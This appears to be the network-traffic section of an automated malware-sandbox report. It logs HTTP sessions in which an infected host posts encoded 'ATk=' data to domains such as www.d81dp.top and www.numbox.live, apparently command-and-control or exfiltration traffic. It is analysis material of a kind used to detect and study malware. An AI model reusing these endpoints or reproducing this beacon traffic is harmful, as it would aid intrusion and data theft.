39 4e 35 33 30 33 42 49 71 6e 47 34 53 59 77 30 74 6c 42 71 61 31 43 50 32 66 50 79 6f 32 42 52 2f 7a 67 41 47 79 6a 44 36 52 6b 52 66 56 42 4b 7a 62 6e 45 78 4f 32 72 51 7a 4e 5a 41 48 37 4c 6b 30 51 59 61 30 44 71 62 47 6c 52 66 44 6b 32 49 37 41 52 75 35 78 2f 6c 4c 54 70 73 59 35 72 38 52 74 49 39 4e 65 38 68 6c 43 37 79 39 64 2b 32 70 42 32 38 32 79 64 57 49 32 73 6b 58 6e 73 37 54 69 42 [TRUNCATED] Data Ascii: ATk=OAIzLskD/9y+w9ykq7oxWD1HJMz5qxq4rcN186IdzFdTrPN4fPb3EC5npuK3U7kqhHLxyhfIjHID2pZ02oPyL+dkHmGWKhZVxwBEIIMnVLr+kO7muCoeylH3t23zOjlNc1DeqwUuwY0l0sPhxSBMDvg93dUG49DCoOv/7g2WGu4kNyBgBPy1Rpnzp7slCa65Xt9irpJ2He9N5303BIqnG4SYw0tlBqa1CP2fPyo2BR/zgAGyjD6RkRfVBKzbnExO2rQzNZAH7Lk0QYa0DqbGlRfDk2I7ARu5x/lLTpsY5r8RtI9Ne8hlC7y9d+2pB282ydWI2skXns7TiBt2V1y7nYp0bfs3iOUYzxFJP04EeYJt2R4vW2ufWKY5FkMYxyXWQo+z6GOrNQWDtYM3Ql8nfdhgNSKjPyEp/u0PHDsgLHc8iKUmRIDPxu2O99BpVY/aFgXN0Wp9fQJKkkEFuHmUg/hUAceuqyspwv6xElZ3v0KsKBLLbcqckgw3sp+G4rw1Pj+WcixU2ef2lSby8ruFm3Q76HicgTpoJIo6LB+Q/scDhT/lgq6rm5zK/tUOMXyFaV4hfhrAiFUNyatLNDjuYHfZarMG4oy25qKS5HDN7z9zAbJ+38wBopT9B/nlA71ENmqvcSH9YA29KjyOjBFccbI3wmywR4vEz9ATUy2kyqJKrHBmEA/do55MV20ZSpEvhPKBnmxLjhLRRW5HofUnPwmtYAJI0z8S6Fbk+HjsirYThNDAH9h+pFpR/yEcjndc+u9im3Jg3DyCgGX+EfuDJ3rtD9B3fyjzOcwDnixPEdXlsbEI9xQc0VbJAvrcxgFHYL0jg4c9oNyoU9nG33a0TtKQ5bq3FU2oJd4uzSRoQkTa8aQt1ki0fAQKpM+IhXxqip5/09s3crVGZoIttfRh/KlKO2wBKbYXWtf8DmTqmrhPXemtBNAetP6ihBbu5tfZcJHQskeBXltUJX/MwQcpLQ3x2442XVYOYuskM8ZWh/XXx8SI [TRUNCATED]
Oct 11, 2024 10:05:51.948553085 CEST	5416	OUT	Data Raw: 6f 48 2b 76 65 48 62 43 61 6f 58 67 47 56 7a 7a 4a 37 73 68 66 44 41 2f 31 46 4b 42 45 75 32 51 46 4e 79 52 69 77 41 5a 61 31 4a 36 66 48 4f 61 48 30 77 68 50 56 46 34 74 50 67 5a 43 31 67 77 44 4e 30 39 6b 50 43 65 33 35 65 61 51 46 74 31 4d 59 Data Ascii: oH+veHbCaoXgGVzzJ7shfDA/1FKBEu2QFNyRiwAZa1J6fHOaH0whPVF4tPgZC1gwDN09kPCe35eaQFt1MYIJxR/lY3aSatQiJpZ3yZ8mNA5/IFGit+1WhT6LbEc1Ww3otibJqMp7/pbKcEgBAUHoMBuG4UT50Vl2AhGXr8nNBjS8lgoVivLHiIbvoFLOM42ayj9aBhTqcOQTsh4vNiA4MlE4bWFWmnrDghlE++TP+4FwtFsCrNN

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.11.20	49903	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:05:54.584857941 CEST	550	OUT	GET /kbee/?ATk=DCgTIaYcg8rLkvez6bpKNDdTbca+kjCnkbIF1Zor3lwvkrlOJ/rxEw94juCbWbA1v3jo2CjSkAc6+9U16ObyEt1HYmrMXA9V8CM6TYsVGbC64eHlmw9Jr2w=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.levelsabovetravel.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:05:54.695588112 CEST	400	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 11 Oct 2024 08:05:54 GMT Content-Type: text/html Content-Length: 260 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 54 6b 3d 44 43 67 54 49 61 59 63 67 38 72 4c 6b 76 65 7a 36 62 70 4b 4e 44 64 54 62 63 61 2b 6b 6a 43 6e 6b 62 49 46 31 5a 6f 72 33 6c 77 76 6b 72 6c 4f 4a 2f 72 78 45 77 39 34 6a 75 43 62 57 62 41 31 76 33 6a 6f 32 43 6a 53 6b 41 63 36 2b 39 55 31 36 4f 62 79 45 74 31 48 59 6d 72 4d 58 41 39 56 38 43 4d 36 54 59 73 56 47 62 43 36 34 65 48 6c 6d 77 39 4a 72 32 77 3d 26 56 44 6f 68 49 3d 35 50 42 4c 5f 70 51 70 54 66 35 68 61 56 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ATk=DCgTIaYcg8rLkvez6bpKNDdTbca+kjCnkbIF1Zor3lwvkrlOJ/rxEw94juCbWbA1v3jo2CjSkAc6+9U16ObyEt1HYmrMXA9V8CM6TYsVGbC64eHlmw9Jr2w=&VDohI=5PBL_pQpTf5haV"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.11.20	49904	154.23.184.194	80

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:06:00.016216993 CEST	786	OUT	POST /9m01/ HTTP/1.1 Host: www.d81dp.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.d81dp.top Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.d81dp.top/9m01/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 56 52 73 48 4d 68 32 75 2f 74 33 65 74 71 35 2b 4c 5a 43 4f 58 74 35 30 38 56 69 54 44 34 41 6e 36 50 72 48 6a 43 33 53 58 53 48 71 51 37 5a 4f 6c 57 4e 30 35 39 58 38 6e 39 30 68 35 59 68 6c 5a 43 54 4e 32 77 54 74 44 4a 61 71 76 34 72 37 42 79 77 4f 4c 5a 69 53 6e 34 63 65 6f 31 33 4b 4e 79 31 75 43 44 61 54 78 44 57 4c 36 7a 66 67 47 6c 77 4d 74 31 31 35 67 73 65 35 51 68 75 57 53 41 2f 59 4a 51 4f 4c 39 30 44 34 67 6d 58 64 6b 64 41 4d 55 7a 65 6b 6a 6d 6c 57 4f 6d 41 71 53 31 41 4d 6b 41 51 45 41 44 70 4b 36 4c 74 51 75 7a 73 75 4c 6e 6b 66 70 33 54 74 78 76 70 63 35 77 3d 3d Data Ascii: ATk=VRsHMh2u/t3etq5+LZCOXt508ViTD4An6PrHjC3SXSHqQ7ZOlWN059X8n90h5YhlZCTN2wTtDJaqv4r7BywOLZiSn4ceo13KNy1uCDaTxDWL6zfgGlwMt115gse5QhuWSA/YJQOL90D4gmXdkdAMUzekjmlWOmAqS1AMkAQEADpK6LtQuzsuLnkfp3Ttxvpc5w==
Oct 11, 2024 10:06:00.311326981 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:06:00 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66938482-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.11.20	49905	154.23.184.194	80

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:06:02.845151901 CEST	806	OUT	POST /9m01/ HTTP/1.1 Host: www.d81dp.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.d81dp.top Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.d81dp.top/9m01/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 56 52 73 48 4d 68 32 75 2f 74 33 65 38 36 70 2b 59 6f 43 4f 53 4e 35 33 32 31 69 54 52 34 41 6a 36 50 33 48 6a 44 7a 43 58 6b 76 71 58 61 70 4f 30 6e 4e 30 31 64 58 38 6f 64 30 67 30 34 68 2b 5a 43 66 7a 32 31 37 74 44 4a 4f 71 76 34 62 37 42 6c 4d 4a 4e 5a 69 71 38 6f 63 63 31 6c 33 4b 4e 79 31 75 43 44 66 4f 78 48 43 4c 39 41 48 67 45 45 77 4c 32 56 31 2b 6a 73 65 35 44 78 75 4b 53 41 2b 6f 4a 53 71 6c 39 33 37 34 67 6b 66 64 6b 73 41 4c 64 7a 65 6d 73 47 6b 37 4e 56 39 61 4a 47 49 49 31 6e 4d 4d 59 52 35 69 32 39 38 4b 7a 42 59 4b 49 30 34 74 74 48 71 46 7a 74 6f 48 6b 31 2f 69 68 42 4d 5a 5a 44 30 34 6e 4d 7a 64 58 70 51 35 75 35 49 3d Data Ascii: ATk=VRsHMh2u/t3e86p+YoCOSN5321iTR4Aj6P3HjDzCXkvqXapO0nN01dX8od0g04h+ZCfz217tDJOqv4b7BlMJNZiq8occ1l3KNy1uCDfOxHCL9AHgEEwL2V1+jse5DxuKSA+oJSql9374gkfdksALdzemsGk7NV9aJGII1nMMYR5i298KzBYKI04ttHqFztoHk1/ihBMZZD04nMzdXpQ5u5I=
Oct 11, 2024 10:06:03.140125990 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:06:02 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66938482-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.11.20	49906	154.23.184.194	80

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:06:05.671566010 CEST	2578	OUT	POST /9m01/ HTTP/1.1 Host: www.d81dp.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.d81dp.top Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.d81dp.top/9m01/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 56 52 73 48 4d 68 32 75 2f 74 33 65 38 36 70 2b 59 6f 43 4f 53 4e 35 33 32 31 69 54 52 34 41 6a 36 50 33 48 6a 44 7a 43 58 6b 6e 71 58 6f 68 4f 6d 31 6c 30 30 64 58 38 6c 39 30 6c 30 34 67 6b 5a 43 47 30 32 31 2f 58 44 4b 32 71 70 72 54 37 56 45 4d 4a 59 70 69 71 6a 34 63 64 6f 31 32 51 4e 79 46 71 43 44 50 4f 78 48 43 4c 39 47 44 67 44 56 77 4c 78 6c 31 35 67 73 65 6c 51 68 75 75 53 41 6e 51 4a 53 2b 62 36 48 62 34 67 45 50 64 33 36 55 4c 46 6a 65 67 70 47 6b 6a 4e 56 78 46 4a 47 6c 78 31 6a 4e 5a 59 53 5a 69 6e 35 42 49 75 53 5a 53 4c 46 30 42 6c 30 4b 39 7a 73 38 37 37 6d 50 6e 68 53 34 4c 65 44 6b 54 35 75 6a 4e 44 36 49 4a 78 50 2f 51 6b 6a 39 46 48 30 47 4d 61 63 73 37 51 66 61 5a 63 5a 78 5a 4d 66 39 73 6d 73 67 55 61 65 47 49 7a 4b 45 4b 76 36 32 52 4f 4f 61 51 6c 45 59 4e 55 74 42 6f 35 4a 75 73 4a 53 66 33 79 74 38 79 72 4a 43 64 33 6d 4b 49 43 72 6a 37 58 5a 71 49 6d 7a 34 67 59 6a 45 43 69 6d 72 41 36 55 43 55 62 54 55 47 34 53 49 76 35 34 52 47 4f 79 55 52 74 4d 72 44 43 43 [TRUNCATED] Data Ascii: ATk=VRsHMh2u/t3e86p+YoCOSN5321iTR4Aj6P3HjDzCXknqXohOm1l00dX8l90l04gkZCG021/XDK2qprT7VEMJYpiqj4cdo12QNyFqCDPOxHCL9GDgDVwLxl15gselQhuuSAnQJS+b6Hb4gEPd36ULFjegpGkjNVxFJGlx1jNZYSZin5BIuSZSLF0Bl0K9zs877mPnhS4LeDkT5ujND6IJxP/Qkj9FH0GMacs7QfaZcZxZMf9smsgUaeGIzKEKv62ROOaQlEYNUtBo5JusJSf3yt8yrJCd3mKICrj7XZqImz4gYjECimrA6UCUbTUG4SIv54RGOyURtMrDCCZ5tvtg79DOJN3KXzgUiom/1RqY5XFT08hXmQgL5Ki950/Qjn+vvBucbKwT/gwk3Pv3Pef6OaZR+nFfMOsKHqu8HJgVVfSeXp1VB3lC3tTx5YQHKSSIbnjhpJuhwk9Imq36T6graojkSPq+Uk3ybUSi6jBXdvinvKI4fmZNNGjeq2VB2+MI/MrDQYnLe4UWpxRswylQYp3ogbPwG/XDXjcFcbMGeX/8A+PVuMnb68yNogzPVATWvWXAMu9aRSUfNu1iDlxKayRNp0NMBpFDQQ3qIU/aZh3HS3maktVEbwV4bcgDJNZ/cEps+U++5fDaFX3SC0ZCp2TwCNnHHLGIx46+cueGwYNfUdk7psxVOEI6WjiYoxV0cyZft+i+lfMP7SeBsQWAlgNWlulcPfelqZdxvkJxuZl9PQ5LVztE0ixePsIUyuufwCaDWLx8tn5yAwLYgnbo8dwnBltrne5o+pX6DLWDfNaiilOygDqnv8AVjzTi0SDPSOjBwh1FV8WI3qpp3j4QeJFBjyamRddk4ak31XwutiOnKv2qJ/NsVpkL2K+8lI63RLO7/1O43JApDjS6KTWtsYg6fHnP4fUWKfXLvu2gAhUiVD3aBxTNFqmU50VipUIArgtfjyUvB2e2lV+70rUUV/j+LFhQMn9okmjbCZqtRDbiwOO5 [TRUNCATED]
Oct 11, 2024 10:06:05.671634912 CEST	5377	OUT	Data Raw: 6e 59 38 50 70 36 78 6c 68 32 6c 79 6c 56 34 64 53 38 79 35 33 4d 36 33 50 41 35 48 65 4d 4b 78 43 38 51 73 69 4b 52 68 79 44 6a 41 47 50 7a 2b 53 61 4b 5a 68 69 72 30 42 4b 73 68 4a 33 78 6e 62 4f 6b 4f 4d 57 57 67 42 54 57 63 2b 49 56 64 6e 5a Data Ascii: nY8Pp6xlh2lylV4dS8y53M63PA5HeMKxC8QsiKRhyDjAGPz+SaKZhir0BKshJ3xnbOkOMWWgBTWc+IVdnZH+xqoCa1UNHTAnLvBp3qEMqFoSxeP79C+AYWO6zYHVqprc42DUP4mG/IUkq6j0XcSCbKAFkodkeET6gkjzLK3x+5aklQrLZCMv+cFC4zR+INFIm7e17W+nMjQOX/8odv2jhuWDG4PGiHi8ea3iGQmNJEIQVVYvZnE
Oct 11, 2024 10:06:05.967258930 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:06:05 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66938482-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.11.20	49907	154.23.184.194	80

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:06:08.495449066 CEST	537	OUT	GET /9m01/?ATk=YTEnPXeuvLCqp8pRYpXUCZpIg36YHpIu3aiFszfHZiHCethv0UoX0rLDgO0m0L5Zay3qgh7+EeCD2cfEa0kxUJqZj+V+1gWSSyE2BB2v0BjXvCGVFHNVoHA=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.d81dp.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:06:08.790644884 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:06:08 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66938482-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.11.20	49908	63.250.47.57	80

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:06:13.972804070 CEST	792	OUT	POST /q7ah/ HTTP/1.1 Host: www.numbox.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.numbox.live Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.numbox.live/q7ah/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 2f 53 7a 56 50 53 77 56 65 4e 76 72 33 79 50 55 55 6e 49 53 34 58 69 69 49 7a 69 45 49 4a 4b 78 52 61 49 6b 7a 38 62 69 79 38 4a 33 36 48 5a 63 2b 30 46 6e 73 33 43 69 46 68 67 74 78 6b 66 6a 4a 75 51 52 6e 64 73 66 61 4e 6c 51 65 44 6d 6a 31 6e 4d 4c 74 37 79 67 71 6b 52 56 48 41 51 67 71 75 79 66 4e 47 73 7a 5a 5a 77 4b 4b 79 65 76 52 71 2f 38 78 6d 34 38 2b 45 79 54 38 34 56 47 56 4b 35 73 2f 30 59 62 4f 37 38 4c 32 6b 43 55 62 58 34 74 61 71 43 2b 5a 78 7a 6e 37 6b 52 4b 6e 32 79 67 6e 4c 48 74 6a 76 54 65 30 2b 45 51 77 73 46 56 4f 41 32 43 5a 66 59 52 71 69 2b 54 33 77 3d 3d Data Ascii: ATk=/SzVPSwVeNvr3yPUUnIS4XiiIziEIJKxRaIkz8biy8J36HZc+0Fns3CiFhgtxkfjJuQRndsfaNlQeDmj1nMLt7ygqkRVHAQgquyfNGszZZwKKyevRq/8xm48+EyT84VGVK5s/0YbO78L2kCUbX4taqC+Zxzn7kRKn2ygnLHtjvTe0+EQwsFVOA2CZfYRqi+T3w==
Oct 11, 2024 10:06:14.160674095 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 11 Oct 2024 08:06:14 GMT Server: Apache Content-Length: 4395 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester \| 404</title><meta charset="utf-8"><link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="js/jquery.js"></script><script src="js/superfish.js"></script><script src="js/jquery.easing.1.3.js"></script><script src="js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6 [TRUNCATED]
Oct 11, 2024 10:06:14.160784960 CEST	1289	IN	Data Raw: 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 Data Ascii: f lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css
Oct 11, 2024 10:06:14.160799980 CEST	1289	IN	Data Raw: 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 72 6f 63 65 73 73 20 30 32 3c 2f Data Ascii: ><a href="#">Process 01</a></li> <li><a href="#">Process 02</a></li> <li><a href="#">Process 03</a></li> </ul> </li> <li><a href="contact.html">Cont
Oct 11, 2024 10:06:14.160898924 CEST	673	IN	Data Raw: 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 Data Ascii: form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a class="icon-1" href

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.11.20	49909	63.250.47.57	80

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:06:16.674484015 CEST	812	OUT	POST /q7ah/ HTTP/1.1 Host: www.numbox.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.numbox.live Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.numbox.live/q7ah/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 2f 53 7a 56 50 53 77 56 65 4e 76 72 32 53 2f 55 57 47 49 53 2b 33 69 74 46 6a 69 45 42 70 4b 31 52 61 30 6b 7a 39 66 79 79 75 74 33 36 6a 64 63 2f 32 74 6e 69 58 43 69 4b 42 67 6f 38 45 66 6f 4a 75 4d 5a 6e 59 55 66 61 4c 4a 51 65 44 32 6a 31 55 6b 4b 73 72 79 69 6d 45 52 58 44 41 51 67 71 75 79 66 4e 47 34 56 5a 59 59 4b 4b 48 57 76 41 37 2f 6a 79 6d 34 2f 75 6b 79 54 34 34 56 43 56 4b 35 65 2f 77 5a 4d 4f 34 55 4c 32 68 47 55 62 46 41 69 52 71 43 38 64 78 79 4a 2f 52 6b 6f 70 69 57 64 32 63 7a 66 37 2b 54 2b 38 49 56 4b 74 65 78 78 4e 54 71 77 64 76 68 35 6f 67 2f 49 71 34 54 46 4c 31 62 6d 36 7a 71 48 59 66 4d 6b 78 63 54 74 46 62 51 3d Data Ascii: ATk=/SzVPSwVeNvr2S/UWGIS+3itFjiEBpK1Ra0kz9fyyut36jdc/2tniXCiKBgo8EfoJuMZnYUfaLJQeD2j1UkKsryimERXDAQgquyfNG4VZYYKKHWvA7/jym4/ukyT44VCVK5e/wZMO4UL2hGUbFAiRqC8dxyJ/RkopiWd2czf7+T+8IVKtexxNTqwdvh5og/Iq4TFL1bm6zqHYfMkxcTtFbQ=
